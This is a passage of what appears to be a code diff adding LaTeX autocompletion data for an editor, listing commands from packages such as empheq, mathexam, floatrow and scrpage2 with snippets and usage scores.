'\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'empheq-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'empheq-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'empheq-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'empheq-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'empheq-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'empheq-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + 
snippet: '\\Acute{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'empheq-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'empheq-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'empheq-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'empheq-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'empheq-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'empheq-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'empheq-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'empheq-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'empheq-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'empheq-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'empheq-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'empheq-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'empheq-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'empheq-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'empheq-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'empheq-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'empheq-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'empheq-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'empheq-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'empheq-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'empheq-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'empheq-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'empheq-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'empheq-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'empheq-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'empheq-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'empheq-cmd', + score: 
0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'empheq-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'empheq-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'empheq-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'empheq-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'empheq-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'empheq-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'empheq-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'empheq-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'empheq-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'empheq-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'empheq-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'empheq-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'empheq-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'empheq-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'empheq-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'empheq-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'empheq-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'empheq-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'empheq-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'empheq-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'empheq-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'empheq-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'empheq-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'empheq-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'empheq-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'empheq-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'empheq-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'empheq-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'empheq-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\xleftrightarrow[][]{}', + snippet: '\\xleftrightarrow[$1][$2]{$3}', + meta: 'empheq-cmd', + score: 
4.015559489911509e-5, + }, + { + caption: '\\vcentcolon', + snippet: '\\vcentcolon', + meta: 'empheq-cmd', + score: 0.00021361943526711615, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'empheq-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\coloneqq', + snippet: '\\coloneqq', + meta: 'empheq-cmd', + score: 0.0014407293323958122, + }, + { + caption: '\\mathclap{}', + snippet: '\\mathclap{$1}', + meta: 'empheq-cmd', + score: 7.84378567451772e-5, + }, + { + caption: '\\adjustlimits', + snippet: '\\adjustlimits', + meta: 'empheq-cmd', + score: 0.0005307066890271085, + }, + { + caption: '\\MoveEqLeft', + snippet: '\\MoveEqLeft', + meta: 'empheq-cmd', + score: 5.343949980628182e-5, + }, + { + caption: '\\mathrlap{}', + snippet: '\\mathrlap{$1}', + meta: 'empheq-cmd', + score: 0.0003112817211637952, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'empheq-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\xhookrightarrow{}', + snippet: '\\xhookrightarrow{$1}', + meta: 'empheq-cmd', + score: 5.444260823474129e-5, + }, + { + caption: '\\DeclarePairedDelimiter{}{}{}', + snippet: '\\DeclarePairedDelimiter{$1}{$2}{$3}', + meta: 'empheq-cmd', + score: 0.0033916678416372487, + }, + { + caption: '\\DeclarePairedDelimiter', + snippet: '\\DeclarePairedDelimiter', + meta: 'empheq-cmd', + score: 0.0033916678416372487, + }, + { + caption: '\\prescript{}{}{}', + snippet: '\\prescript{$1}{$2}{$3}', + meta: 'empheq-cmd', + score: 8.833369785705982e-6, + }, + { + caption: '\\underbrace{}', + snippet: '\\underbrace{$1}', + meta: 'empheq-cmd', + score: 0.010373780436850907, + }, + { + caption: '\\mathllap{}', + snippet: '\\mathllap{$1}', + meta: 'empheq-cmd', + score: 3.140504277052775e-5, + }, + { + caption: '\\overbrace{}', + snippet: '\\overbrace{$1}', + meta: 'empheq-cmd', + score: 0.0006045704778718376, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'empheq-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'empheq-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'empheq-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'empheq-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'empheq-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'empheq-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'empheq-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'empheq-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'empheq-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'empheq-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'empheq-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'empheq-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'empheq-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'empheq-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'empheq-cmd', + score: 0.050370402546134785, + }, + { + caption: 
'\\varliminf', + snippet: '\\varliminf', + meta: 'empheq-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'empheq-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'empheq-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'empheq-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'empheq-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'empheq-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'empheq-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'empheq-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'empheq-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'empheq-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'empheq-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'empheq-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'empheq-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'empheq-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'empheq-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'empheq-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'empheq-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'empheq-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'empheq-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'empheq-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'empheq-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'empheq-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'empheq-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'empheq-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'empheq-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'empheq-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'empheq-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'empheq-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'empheq-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'empheq-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'empheq-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'empheq-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'empheq-cmd', + score: 0.029440493885398676, + }, + { + 
caption: '\\csc', + snippet: '\\csc', + meta: 'empheq-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'empheq-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'empheq-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'empheq-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'empheq-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'empheq-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'empheq-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'empheq-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'empheq-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'empheq-cmd', + score: 0.0063276692758974925, + }, + ], + mathexam: [ + { + caption: '\\ExamInstrBox{}', + snippet: '\\ExamInstrBox{$1}', + meta: 'mathexam-cmd', + score: 0.00035308240943436196, + }, + { + caption: '\\ExamName{}', + snippet: '\\ExamName{$1}', + meta: 'mathexam-cmd', + score: 0.00165391233892938, + }, + { + caption: '\\ExamNameLine', + snippet: '\\ExamNameLine', + meta: 'mathexam-cmd', + score: 0.00165391233892938, + }, + { + caption: '\\ExamClass{}', + snippet: '\\ExamClass{$1}', + meta: 'mathexam-cmd', + score: 0.00165391233892938, + }, + { + caption: '\\ExamHead{}', + snippet: '\\ExamHead{$1}', + meta: 'mathexam-cmd', + score: 0.00165391233892938, + }, + { + caption: '\\answer{}', + snippet: '\\answer{$1}', + meta: 'mathexam-cmd', + score: 0.0034436236729672894, + }, + { + caption: '\\answer', + snippet: '\\answer', + meta: 'mathexam-cmd', + score: 0.0034436236729672894, + }, + { + caption: '\\lhead{}', + snippet: '\\lhead{$1}', + meta: 'mathexam-cmd', + score: 0.05268978171228714, + }, + { + caption: '\\chaptermark', + snippet: '\\chaptermark', + meta: 'mathexam-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\chaptermark{}', + snippet: '\\chaptermark{$1}', + meta: 'mathexam-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\fancypagestyle{}{}', + snippet: '\\fancypagestyle{$1}{$2}', + meta: 'mathexam-cmd', + score: 0.009430919590937878, + }, + { + caption: '\\footrule', + snippet: '\\footrule', + meta: 'mathexam-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\footrule{}', + snippet: '\\footrule{$1}', + meta: 'mathexam-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\fancyfoot[]{}', + snippet: '\\fancyfoot[$1]{$2}', + meta: 'mathexam-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfoot{}', + snippet: '\\fancyfoot{$1}', + meta: 'mathexam-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfootoffset[]{}', + snippet: '\\fancyfootoffset[$1]{$2}', + meta: 'mathexam-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\fancyfootoffset{}', + snippet: '\\fancyfootoffset{$1}', + meta: 'mathexam-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\footruleskip', + snippet: '\\footruleskip', + meta: 'mathexam-cmd', + score: 0.000830117957327721, + }, + { + caption: '\\fancyheadoffset[]{}', + snippet: '\\fancyheadoffset[$1]{$2}', + meta: 'mathexam-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\fancyheadoffset{}', + snippet: 
'\\fancyheadoffset{$1}', + meta: 'mathexam-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\iffloatpage{}{}', + snippet: '\\iffloatpage{$1}{$2}', + meta: 'mathexam-cmd', + score: 6.606286310833368e-5, + }, + { + caption: '\\cfoot{}', + snippet: '\\cfoot{$1}', + meta: 'mathexam-cmd', + score: 0.013411641301057813, + }, + { + caption: '\\subsectionmark', + snippet: '\\subsectionmark', + meta: 'mathexam-cmd', + score: 3.1153423008593836e-5, + }, + { + caption: '\\footrulewidth', + snippet: '\\footrulewidth', + meta: 'mathexam-cmd', + score: 0.011424740897486949, + }, + { + caption: '\\fancyhfoffset[]{}', + snippet: '\\fancyhfoffset[$1]{$2}', + meta: 'mathexam-cmd', + score: 3.741978601121172e-5, + }, + { + caption: '\\rhead{}', + snippet: '\\rhead{$1}', + meta: 'mathexam-cmd', + score: 0.022782817416731292, + }, + { + caption: '\\fancyplain{}{}', + snippet: '\\fancyplain{$1}{$2}', + meta: 'mathexam-cmd', + score: 0.007402339896386138, + }, + { + caption: '\\rfoot{}', + snippet: '\\rfoot{$1}', + meta: 'mathexam-cmd', + score: 0.013393817825547868, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mathexam-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\plainheadrulewidth', + snippet: '\\plainheadrulewidth', + meta: 'mathexam-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\baselinestretch', + snippet: '\\baselinestretch', + meta: 'mathexam-cmd', + score: 0.03225350148161425, + }, + { + caption: '\\lfoot{}', + snippet: '\\lfoot{$1}', + meta: 'mathexam-cmd', + score: 0.00789399846642229, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'mathexam-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'mathexam-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\fancyhf{}', + snippet: '\\fancyhf{$1}', + meta: 'mathexam-cmd', + score: 0.02314618933449356, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'mathexam-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\fancyhead[]{}', + snippet: '\\fancyhead[$1]{$2}', + meta: 'mathexam-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\fancyhead{}', + snippet: '\\fancyhead{$1}', + meta: 'mathexam-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\nouppercase{}', + snippet: '\\nouppercase{$1}', + meta: 'mathexam-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\nouppercase', + snippet: '\\nouppercase', + meta: 'mathexam-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\headrule', + snippet: '\\headrule', + meta: 'mathexam-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\headrule{}', + snippet: '\\headrule{$1}', + meta: 'mathexam-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\chead{}', + snippet: '\\chead{$1}', + meta: 'mathexam-cmd', + score: 0.00755042164734884, + }, + { + caption: '\\headrulewidth', + snippet: '\\headrulewidth', + meta: 'mathexam-cmd', + score: 0.02268137935335823, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'mathexam-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'mathexam-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'mathexam-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'mathexam-cmd', + score: 0.0009170966832172938, + }, + { + caption: 
'\\value{}', + snippet: '\\value{$1}', + meta: 'mathexam-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'mathexam-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'mathexam-cmd', + score: 0.001042697111754002, + }, + ], + floatrow: [ + { + caption: '\\floatfoot{}', + snippet: '\\floatfoot{$1}', + meta: 'floatrow-cmd', + score: 0.0015365464531749851, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'floatrow-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatsetup[]{}', + snippet: '\\floatsetup[$1]{$2}', + meta: 'floatrow-cmd', + score: 0.0005456136119914056, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'floatrow-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'floatrow-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'floatrow-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'floatrow-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'floatrow-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'floatrow-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'floatrow-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'floatrow-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'floatrow-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'floatrow-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'floatrow-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'floatrow-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'floatrow-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'floatrow-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'floatrow-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'floatrow-cmd', + score: 0.021473212893597875, + }, + ], + scrpage2: [ + { + caption: '\\automark[]{}', + snippet: '\\automark[$1]{$2}', + meta: 'scrpage2-cmd', + score: 0.0006703031783997437, + }, + { + caption: '\\automark{}', + snippet: '\\automark{$1}', + meta: 'scrpage2-cmd', + score: 0.0006703031783997437, + }, + { + caption: '\\ofoot{}', + snippet: '\\ofoot{$1}', + meta: 'scrpage2-cmd', + score: 0.000605620621498142, + }, + { + caption: '\\ofoot[]{}', + snippet: '\\ofoot[$1]{$2}', + meta: 'scrpage2-cmd', + score: 0.000605620621498142, + }, + { + caption: '\\ohead{}', + snippet: '\\ohead{$1}', + meta: 'scrpage2-cmd', + score: 0.004845161937670253, + }, + { + caption: '\\ohead[]{}', + snippet: 
'\\ohead[$1]{$2}', + meta: 'scrpage2-cmd', + score: 0.004845161937670253, + }, + { + caption: '\\headfont', + snippet: '\\headfont', + meta: 'scrpage2-cmd', + score: 0.0011116915941419892, + }, + { + caption: '\\setheadsepline{}', + snippet: '\\setheadsepline{$1}', + meta: 'scrpage2-cmd', + score: 0.00023538827295624133, + }, + { + caption: '\\clearscrheadings', + snippet: '\\clearscrheadings', + meta: 'scrpage2-cmd', + score: 0.0003679125016983611, + }, + { + caption: '\\clearscrheadfoot', + snippet: '\\clearscrheadfoot', + meta: 'scrpage2-cmd', + score: 0.000558377093879783, + }, + { + caption: '\\pagemark', + snippet: '\\pagemark', + meta: 'scrpage2-cmd', + score: 0.0017520841736604843, + }, + { + caption: '\\chead{}', + snippet: '\\chead{$1}', + meta: 'scrpage2-cmd', + score: 0.00755042164734884, + }, + { + caption: '\\clearscrplain', + snippet: '\\clearscrplain', + meta: 'scrpage2-cmd', + score: 0.00013252422874211978, + }, + { + caption: '\\ifoot{}', + snippet: '\\ifoot{$1}', + meta: 'scrpage2-cmd', + score: 0.0003620142864171218, + }, + { + caption: '\\ifoot[]{}', + snippet: '\\ifoot[$1]{$2}', + meta: 'scrpage2-cmd', + score: 0.0003620142864171218, + }, + { + caption: '\\ihead{}', + snippet: '\\ihead{$1}', + meta: 'scrpage2-cmd', + score: 0.0004507603139230655, + }, + { + caption: '\\ihead[]{}', + snippet: '\\ihead[$1]{$2}', + meta: 'scrpage2-cmd', + score: 0.0004507603139230655, + }, + { + caption: '\\cfoot{}', + snippet: '\\cfoot{$1}', + meta: 'scrpage2-cmd', + score: 0.013411641301057813, + }, + ], + pbox: [ + { + caption: '\\pbox{}{}', + snippet: '\\pbox{$1}{$2}', + meta: 'pbox-cmd', + score: 0.0010883030320478486, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'pbox-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'pbox-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'pbox-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'pbox-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'pbox-cmd', + 